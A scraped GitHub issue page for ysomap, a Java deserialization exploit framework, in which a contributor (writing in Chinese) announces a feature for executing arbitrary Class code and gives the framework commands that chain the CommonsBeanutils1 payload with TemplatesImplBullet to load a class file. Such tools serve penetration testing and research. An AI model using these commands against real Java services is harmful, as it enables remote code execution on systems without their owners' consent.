wh1t3p1g / ysomap

A helpful Java Deserialization exploit framework.
Apache License 2.0
1.17k stars 150 forks source link

新增执行Class功能 可以执行任意Class代码 #35

Closed BeichenDream closed 2 years ago

BeichenDream commented 2 years ago

使用方法 use payload CommonsBeanutils1 use bullet TemplatesImplBullet set effect RunClassLoader set type loader set body 'd:/calc.class' run